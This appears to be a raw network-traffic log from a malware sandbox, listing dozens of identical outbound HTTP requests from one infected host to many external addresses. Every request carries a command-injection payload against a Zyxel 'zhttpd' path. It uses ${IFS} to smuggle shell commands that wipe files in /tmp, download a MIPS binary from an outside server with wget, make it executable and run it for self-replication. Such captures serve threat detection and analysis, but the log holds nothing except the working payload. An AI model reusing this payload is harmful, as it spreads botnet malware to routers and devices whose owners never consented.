                                                Jan 12, 2024 18:24:44.068423033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6616192.168.2.1354468218.153.94.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.068459988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6617192.168.2.133620866.189.206.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.068525076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6618192.168.2.1359664101.174.150.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.068550110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6619192.168.2.1336210160.63.175.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.068578005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6620192.168.2.135882258.241.238.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.068636894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6621192.168.2.134792650.140.11.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.068665981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6622192.168.2.134945082.38.226.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.068763018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6623192.168.2.1353182167.115.239.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.077009916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6624192.168.2.133441641.15.33.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.077075005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6625192.168.2.133882214.21.43.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.077130079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6626192.168.2.133579089.121.187.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.077198982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6627192.168.2.1337384167.162.206.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.077265978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6628192.168.2.1354118116.91.146.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.077325106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6629192.168.2.1357934103.169.197.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.077373981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6630192.168.2.133692461.0.207.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.077428102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6631192.168.2.135807883.205.219.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.077497005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6632192.168.2.1349814194.213.154.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.077567101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6633192.168.2.1345828105.87.76.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.077605963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6634192.168.2.1360320213.238.95.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.077682018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6635192.168.2.1354672180.157.195.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.077723026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6636192.168.2.1354266109.101.181.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.077774048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6637192.168.2.1342942114.189.137.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.077833891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6638192.168.2.1341844183.119.119.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.077917099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6639192.168.2.1354800141.183.48.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.077941895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6640192.168.2.1338592163.3.7.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.077995062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6641192.168.2.135825831.68.102.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.078044891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6642192.168.2.135961469.120.249.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.078074932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6643192.168.2.133683464.3.128.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.078155041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6644192.168.2.134429046.96.156.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.078202009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6645192.168.2.1337488117.174.162.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.078308105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6646192.168.2.135228250.5.153.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.078362942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6647192.168.2.135203437.252.19.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.078432083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6648192.168.2.134722062.198.212.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.078470945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6649192.168.2.1354964194.185.37.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.078552008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6650192.168.2.134771414.121.152.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.078612089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6651192.168.2.134039643.133.212.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.078660965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6652192.168.2.136056677.132.108.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.078710079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6653192.168.2.1351848222.171.39.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.078754902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6654192.168.2.134549073.140.227.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.078810930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6655192.168.2.1339384158.179.165.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.078862906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6656192.168.2.135537876.164.78.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.078892946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6657192.168.2.1345800188.146.114.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.078953028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6658192.168.2.1345650204.2.161.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.079025030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6659192.168.2.1348312191.221.10.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.079068899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6660192.168.2.135990250.217.52.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.079127073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6661192.168.2.1339516194.44.136.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.079173088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6662192.168.2.1336736117.61.160.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.079226017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6663192.168.2.133638457.243.208.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.079291105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6664192.168.2.1353246110.81.10.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.079355955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6665192.168.2.1345096151.148.156.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.079401016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6666192.168.2.134530273.182.41.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.079437971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6667192.168.2.1342396139.208.159.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.079488039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6668192.168.2.1348520144.76.222.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.079550028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6669192.168.2.1335252116.225.194.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.079613924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6670192.168.2.135458099.149.57.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.079659939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6671192.168.2.133430289.207.121.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.079719067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6672192.168.2.1360510161.97.85.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.079780102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6673192.168.2.134583082.94.67.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.079832077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6674192.168.2.133317432.40.120.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.079864979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6675192.168.2.1341102168.212.175.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.079931021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6676192.168.2.1358160220.38.6.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.079967022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6677192.168.2.134254271.42.148.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:45.080033064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6678192.168.2.1341674187.132.216.222443
                                                TimestampBytes transferredDirectionData
